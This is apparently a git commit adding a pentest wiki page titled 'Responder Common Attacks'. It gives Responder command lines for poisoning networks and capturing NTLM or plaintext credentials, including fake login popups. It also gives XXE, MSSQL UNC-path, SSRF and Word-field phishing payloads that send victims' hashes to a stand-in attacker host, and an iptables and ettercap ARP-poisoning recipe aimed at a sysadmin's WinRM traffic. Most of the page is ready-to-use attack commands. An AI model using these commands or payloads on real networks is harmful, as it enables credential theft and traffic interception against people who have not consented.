Created Responder Common Attacks (markdown)

2025-08-22 06:13:39 -07:00 · 2021-04-21 16:31:32 -03:00 · 2021-04-21 16:31:32 -03:00 · 4cbb264a0e
commit 4cbb264a0e
parent a67abeba55
1 changed files with 92 additions and 0 deletions
--- a/Responder-Common-Attacks.md
+++ b/Responder-Common-Attacks.md
@ -0,0 +1,92 @@
+# Responder Common Attacks:
+
+## Basic usage:
+
+Redirect workstations to Responder HTTP authentication server and grab NTLM credentials:
+>./Responder.py -I wlp2s0 -r**F**
+
+Redirect workstations to Responder HTTP authentication server and grab plaintext credentials (this sends a login popup on the victim's workstation):
+>./Responder.py -I wlp2s0 -r**b**
+
+Redirect workstations to Responder HTTP Proxy authentication server and grab NTLM credentials:
+>./Responder.py -I wlp2s0 -r**P**
+
+Redirect workstations to Responder HTTP Proxy authentication server and grab plaintext credentials (this sends a login popup on the victim's workstation):
+>./Responder.py -I wlp2s0 -r**Pb**
+
+Redirect workstations to Responder HTTP WPAD proxy and intercept web traffic (Responder will also inject a SMB UNC path to grab credentials transparently):
+>./Responder.py -I wlp2s0 -r**w**
+
+Redirect workstations to Responder HTTP WPAD proxy, intercept web traffic and force NTLM authentication:
+>./Responder.py -I wlp2s0 -r**wF**
+
+Redirect workstations to an other IP instead of Responder's one:
+>./Responder.py -I wlp2s0 -r**e** 10.0.0.234
+
+## More Advanced attacks
+
+Responder can be used as a poisoner but can also be used as rogue servers when combining with other attacks, these attacks will be documented below.
+
+### External Pentest
+Responder can be used on an external pentest in the following situation: 
+
+* XXE:
+
+Set your XXE payload this way: 
+
+`<!DOCTYPE foo [ <!ENTITY xxe SYSTEM "http://Responder-External-IP/test"> ]>`
+
+
+Watch for any HTTP hashes coming in on your Responder shell.
+
+Another way would be to set a UNC path instead (less reliable since outbound SMB is often blocked):
+
+`<!DOCTYPE foo [ <!ENTITY xxe SYSTEM "file://Responder-External-IP/test"> ]>`
+
+* MSSQL SQLi:
+
+SQL Injection on MSSQL can lead to NTLMv1/2 hash grab:
+
+`xp_dirtree "\\RESPONDER-IP\share";`
+
+`xp_fileexist '\\RESPONDER-IP\file';`
+
+
+* SSRF:
+
+Point your SSRF payload to Responder: 
+
+`http://Responder-External-IP/123.html`
+
+* Phising:
+
+Create a word document and open it: 
+
+`Hit CTRL + F9 -> IMPORT "\\\\Responder-IP\\123.jpg" -> right click and select "Edit Field" -> tick "Data not stored in document" -> save & close.`
+
+When the victim opens the document, an SMB request will be issued to Responder-IP.
+
+### Internal Pentest
+
+Responder can be used as a rogue authentication server toolkit when combined with ARP poisoning.
+
+Let's take the example where you know that a sysadmin workstation is located at IP: 192.168.0.153 and you know that this sysadmin is using WinRM to administer servers remotely.
+
+Sysadmin workstation: 
+
+192.168.0.153
+
+Switch IP:
+
+192.168.0.254
+
+Let's set an ARP Prerouting attack, and redirect the sysadmin workstation to our rogue WinRM server:
+
+//Block ICMP to prevent outgoing ICMP
+> iptables -A OUTPUT -p ICMP -j DROP
+
+//Rewrite IP header destination with your IP instead of the original one for all packets going to TCP 5986
+> iptables -t nat -A PREROUTING -p tcp --dport 5986 -j DNAT --to-destination YOUR-IP:5986
+
+//Enable IP Forward to avoid disruption and launch a targeted ARP attack against 192.168.0.153
+>echo 1 > /proc/sys/net/ipv4/ip_forward&&ettercap -T -q -w dump-session.pcap -p -M arp:remote /192.168.0.254// /192.168.0.153//